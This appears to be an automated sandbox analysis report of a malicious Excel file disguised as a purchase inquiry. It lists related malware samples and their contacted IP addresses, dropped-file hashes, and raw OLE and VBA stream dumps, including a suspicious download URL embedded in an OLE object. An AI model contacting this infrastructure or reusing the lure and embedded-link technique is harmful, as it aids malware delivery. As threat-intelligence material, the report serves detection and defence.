                                      SecuriteInfo.com.Trojan.Siggen30.32904.13677.12750.exeGet hashmaliciousUnknownBrowse
                                      • 104.168.28.10
                                      niceworkingskillwthichbetterperformancefromme.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                      • 172.245.123.17
                                      nicegirlwanttokissingmylipswithnicely.htaGet hashmaliciousRemcosBrowse
                                      • 198.46.178.132
                                      dxRwXy19pq.exeGet hashmaliciousSocks5SystemzBrowse
                                      • 104.168.28.10
                                      UpdatedStatementSheet_InvoicesPaid_PaymentAdviceFPJUSHNRVB.htmlGet hashmaliciousUnknownBrowse
                                      • 104.168.69.110
                                      12321321.exeGet hashmaliciousSocks5SystemzBrowse
                                      • 104.168.28.10
                                      SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                      • 23.95.235.9
                                      SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                      • 23.95.235.9
                                      SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                      • 23.95.235.9
                                      AMAZONEXPANSIONGB3CXHt817IG.exeGet hashmaliciousFormBookBrowse
                                      • 3.33.130.190
                                      https://www.vecteezy.com/photo/37980743-defocused-blurred-image-of-inside-pharmacy-store-for-abstract-backgroundGet hashmaliciousUnknownBrowse
                                      • 52.223.40.198
                                      niceworkingskillwthichbetterperformancefromme.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                      • 3.33.130.190
                                      https://gumbys.comGet hashmaliciousUnknownBrowse
                                      • 52.223.40.198
                                      5IbkCQPDbQ.exeGet hashmaliciousFormBookBrowse
                                      • 3.33.130.190
                                      mfIKZpIL0X.exeGet hashmaliciousFormBookBrowse
                                      • 3.33.130.190
                                      NEW PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                      • 3.33.130.190
                                      lJEn8ko37k.exeGet hashmaliciousFormBookBrowse
                                      • 3.33.130.190
                                      docs attached, DHL 1344857301..exeGet hashmaliciousFormBookBrowse
                                      • 3.33.130.190
                                      https://www.gruzoved.com/blog/post/eshe-dve-dorogi-zakryli-na-sahaline-iz-za-nepogody/?next=https%3A%2F%2Fgamma.app%2Fdocs%2Fmeyertrucks-Trust-Meyer-Trucks-diesel-truck-bus-parts-q218q3p16jcbi7h%3Fmode%3Dpresent%23card-5kvf1fu5246tolrGet hashmaliciousUnknownBrowse
                                      • 3.33.235.18
                                      MICROSOFT-CORP-MSN-AS-BLOCKUShttps://t.co/mY98iSAcuvGet hashmaliciousUnknownBrowse
                                      • 40.114.178.124
                                      f492136216_mpengine_dllGet hashmaliciousUnknownBrowse
                                      • 204.79.197.203
                                      https://go.irt.calyx.ai/LiveGet hashmaliciousUnknownBrowse
                                      • 13.107.246.60
                                      https://dsl.mycomputer2000.com/zzzz/23RDJANUARY%20OVERDUE.INV.PDF.7zGet hashmaliciousUnknownBrowse
                                      • 104.40.67.196
                                      Maria Sit_imccwzlgvfw.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 40.114.177.156
                                      splspc.elfGet hashmaliciousUnknownBrowse
                                      • 20.104.199.213
                                      nklx86.elfGet hashmaliciousUnknownBrowse
                                      • 13.65.160.210
                                      nklarm.elfGet hashmaliciousUnknownBrowse
                                      • 191.234.39.19
                                      nklspc.elfGet hashmaliciousUnknownBrowse
                                      • 143.98.79.210
                                      nklmips.elfGet hashmaliciousUnknownBrowse
                                      • 20.113.132.10
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      6271f898ce5be7dd52b0fc260d0662b3https://t.co/mY98iSAcuvGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      NEW ORDER (PO. 2100002 (BT-INC).xlsGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      New Order.xlsGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      Doc9078786968795776764567.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      NEW ORDER (PO. 2100002 (BT-INC).xlsGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      New Order.xlsGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      Purchase Order.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • 3.39.153.44
                                      a0e9f5d64349fb13191bc781f81f42e1EasyWay.exeGet hashmaliciousLummaC StealerBrowse
                                      • 13.107.253.72
                                      Aura.exeGet hashmaliciousLummaC StealerBrowse
                                      • 13.107.253.72
                                      EasyWay.exeGet hashmaliciousLummaC StealerBrowse
                                      • 13.107.253.72
                                      Aura.exeGet hashmaliciousLummaC StealerBrowse
                                      • 13.107.253.72
                                      SecuriteInfo.com.Trojan.PWS.Lumma.1819.11767.23234.exeGet hashmaliciousLummaC StealerBrowse
                                      • 13.107.253.72
                                      SecuriteInfo.com.Trojan.PWS.Lumma.1819.32341.28310.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYSBrowse
                                      • 13.107.253.72
                                      HjBGqnNSh1.exeGet hashmaliciousUnknownBrowse
                                      • 13.107.253.72
                                      BTn1AT2k3Y.exeGet hashmaliciousLummaC StealerBrowse
                                      • 13.107.253.72
                                      OjM4NF84XM.exeGet hashmaliciousAmadey, GCleaner, LummaC StealerBrowse
                                      • 13.107.253.72
                                      6DRdNEnOMn.exeGet hashmaliciousLummaC StealerBrowse
                                      • 13.107.253.72
                                      No context
                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):118
                                      Entropy (8bit):3.5700810731231707
                                      Encrypted:false
                                      SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                      MD5:573220372DA4ED487441611079B623CD
                                      SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                      SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                      SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):784
                                      Entropy (8bit):2.7137690747287806
                                      Encrypted:false
                                      SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                                      MD5:09F73B3902CD3D88E04312787956B654
                                      SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                                      SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                                      SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):512
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):165
                                      Entropy (8bit):1.7769794087092887
                                      Encrypted:false
                                      SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                      MD5:37BD8218D560948827D3B948CAFA579C
                                      SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                      SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                      SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                      Malicious:true
                                      Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 10 05:34:50 2025, Security: 1
                                      Entropy (8bit):7.9788139371410525
                                      TrID:
                                      • Microsoft Excel sheet (30009/1) 47.99%
                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                      File name:Purchase Inquiry.xla.xlsx
                                      File size:1'199'616 bytes
                                      MD5:c672b4eeec39f46454b43c1214ef293f
                                      SHA1:2e706822d8e8f6250ff0d0dad46ce3886f71c08e
                                      SHA256:081c752918d77ca90b7c46d538720c4a64b04593acd3d68f0ba9a5decbc99061
                                      SHA512:80f9c1e0894327bca8f8d45de997a566027abe1a912c9b631426db0289b34708c4b450034dbfff914cc75c0ece9058dd40fb970b1436a191981bc8a6299a40d2
                                      SSDEEP:24576:wJIwgJIb3nOXYXKFlQB0Nu/KU+0hPCwTKrsJ39TdjndVOo:wzgG7O7Fl2OP66BrsJ39Tdbi
                                      TLSH:9E4523D0BD847B06CF17023A5F9ED46E580BBE6F1688950B7634779A1232D7D81F223A
                                      File Content Preview:........................>...............................................................................................................{.......}..............................................................................................................
                                      Icon Hash:35e58a8c0c8a85b9
                                      Document Type:OLE
                                      Number of OLE Files:1
                                      Has Summary Info:
                                      Application Name:Microsoft Excel
                                      Encrypted Document:True
                                      Contains Word Document Stream:False
                                      Contains Workbook/Book Stream:True
                                      Contains PowerPoint Document Stream:False
                                      Contains Visio Document Stream:False
                                      Contains ObjectPool Stream:False
                                      Flash Objects Count:0
                                      Contains VBA Macros:True
                                      Code Page:1252
                                      Author:
                                      Last Saved By:
                                      Create Time:2006-09-16 00:00:00
                                      Last Saved Time:2025-03-10 05:34:50
                                      Creating Application:Microsoft Excel
                                      Security:1
                                      Document Code Page:1252
                                      Thumbnail Scaling Desired:False
                                      Contains Dirty Links:False
                                      Shared Document:False
                                      Changed Hyperlinks:False
                                      Application Version:786432
                                      General
                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                      VBA File Name:Sheet1.cls
                                      Stream Size:977
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a4 77 0e 8a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Attribute VB_Name = "Sheet1"
                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                      Attribute VB_GlobalNameSpace = False
                                      Attribute VB_Creatable = False
                                      Attribute VB_PredeclaredId = True
                                      Attribute VB_Exposed = True
                                      Attribute VB_TemplateDerived = False
                                      Attribute VB_Customizable = True
                                      

                                      General
                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                      VBA File Name:Sheet2.cls
                                      Stream Size:977
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w , j . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a4 77 2c 6a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Attribute VB_Name = "Sheet2"
                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                      Attribute VB_GlobalNameSpace = False
                                      Attribute VB_Creatable = False
                                      Attribute VB_PredeclaredId = True
                                      Attribute VB_Exposed = True
                                      Attribute VB_TemplateDerived = False
                                      Attribute VB_Customizable = True
                                      

                                      General
                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                      VBA File Name:Sheet3.cls
                                      Stream Size:977
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w = . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a4 77 e6 3d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Attribute VB_Name = "Sheet3"
                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                      Attribute VB_GlobalNameSpace = False
                                      Attribute VB_Creatable = False
                                      Attribute VB_PredeclaredId = True
                                      Attribute VB_Exposed = True
                                      Attribute VB_TemplateDerived = False
                                      Attribute VB_Customizable = True
                                      

                                      General
                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                      VBA File Name:ThisWorkbook.cls
                                      Stream Size:985
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a4 77 da 90 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Attribute VB_Name = "ThisWorkbook"
                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                      Attribute VB_GlobalNameSpace = False
                                      Attribute VB_Creatable = False
                                      Attribute VB_PredeclaredId = True
                                      Attribute VB_Exposed = True
                                      Attribute VB_TemplateDerived = False
                                      Attribute VB_Customizable = True
                                      

                                      General
                                      Stream Path:\x1CompObj
                                      CLSID:
                                      File Type:data
                                      Stream Size:114
                                      Entropy:4.25248375192737
                                      Base64 Encoded:True
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                      General
                                      Stream Path:\x5DocumentSummaryInformation
                                      CLSID:
                                      File Type:data
                                      Stream Size:244
                                      Entropy:2.889430592781307
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                      General
                                      Stream Path:\x5SummaryInformation
                                      CLSID:
                                      File Type:data
                                      Stream Size:200
                                      Entropy:3.226575879994164
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . c $ ~ . . . . . . . . .
                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                      General
                                      Stream Path:MBD004F96D2/\x1CompObj
                                      CLSID:
                                      File Type:data
                                      Stream Size:99
                                      Entropy:3.631242196770981
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                      General
                                      Stream Path:MBD004F96D2/Package
                                      CLSID:
                                      File Type:Microsoft Excel 2007+
                                      Stream Size:904446
                                      Entropy:7.992262426764061
                                      Base64 Encoded:True
                                      Data ASCII:P K . . . . . . . . . . ! . h . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d5 68 cd d7 f9 01 00 00 da 08 00 00 13 00 c4 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c0 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      General
                                      Stream Path:MBD004F96D3/\x1Ole
                                      CLSID:
                                      File Type:data
                                      Stream Size:756
                                      Entropy:5.21668721763852
                                      Base64 Encoded:False
                                      Data ASCII:. . . . . Q . x . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . l . i . n . k . . . s . a . j . a . . . m . a . r . k . e . t . / . q . h . F . d . y . e . U . k . n . z . ? . & . l . o . v . e . = . w . a . g . g . i . s . h . & . n . e . p . h . e . w . . . l . D ] j . D & } . Q n . : L R v . . C J 2 [ . . . J . . P . m . . w t L P ; p ~ . w F + 7 . . ! 1 { g _ @ . . . _ C j . , { & O | \\ f . % 2 d B } . . . . . . . . . . . . . . . . . . . . . I . V . B . r . h . y .
                                      Data Raw:01 00 00 02 f7 ec da 0d 51 1b bf 78 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b fe 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6c 00 69 00 6e 00 6b 00 2e 00 73 00 61 00 6a 00 61 00 2e 00 6d 00 61 00 72 00 6b 00 65 00 74 00 2f 00 71 00 68 00 46 00 64 00 79 00 65 00 55 00 6b 00 6e 00 7a 00 3f 00 26 00 6c 00 6f 00 76 00
                                      General
                                      Stream Path:Workbook
                                      CLSID:
                                      File Type:Applesoft BASIC program data, first line number 16
                                      Stream Size:270887
                                      Entropy:7.998386624139689
                                      Base64 Encoded:True
                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . m z . F @ . ; _ . h . . 0 . . 8 d % . . . + e { / m | . . . . . . . . . . . . . . \\ . p . . 3 7 t . . U w g < } I . . i 6 R J h 5 F , - L 9 . o ? * + @ Y C . K A W H x a V X . . 6 B = / g . . B 1 b N . . . m z B . . . # a . . . . . . . = . . . ~ = _ . . . . . 1 . ^ % r . . . . . . . . w S . . . . 7 . . . . . . . { . . . . o = . . . S ) . N < - * . . @ . . . K . . . . E " . . . . . . . . . . . . . . W 1 . . . I _ s ' f . " H V . . 1 . . . . z u r y .
                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 6d b5 c6 7a 16 46 b3 a9 40 93 1e d1 3b 5f 02 9a 68 1c 06 85 30 0b 00 b4 38 64 f8 25 b7 8f e4 bf e8 f2 09 c0 f8 cf 16 0b 2b bc 65 ff 7b 2f 6d 7c 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 d4 98 e2 00 00 00 5c 00 70 00 9d f2 13 95 82 33 37 d9 74 bc 04 85 ca d3 9d 8b bc 92 fc de cb c0 84 55 77 f9
                                      General
                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                      CLSID:
                                      File Type:ASCII text, with CRLF line terminators
                                      Stream Size:531
                                      Entropy:5.20073532122586
                                      Base64 Encoded:True
                                      Data ASCII:I D = " { A 1 C 2 C C 0 0 - E 7 E 6 - 4 A E A - A B 7 6 - A F 3 A 0 A 6 7 5 B 0 8 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 6 3 4 2 5 C B 3 D D B C D D F C
                                      Data Raw:49 44 3d 22 7b 41 31 43 32 43 43 30 30 2d 45 37 45 36 2d 34 41 45 41 2d 41 42 37 36 2d 41 46 33 41 30 41 36 37 35 42 30 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                      General
                                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                      CLSID:
                                      File Type:data
                                      Stream Size:104
                                      Entropy:3.0488640812019017
                                      Base64 Encoded:False
                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
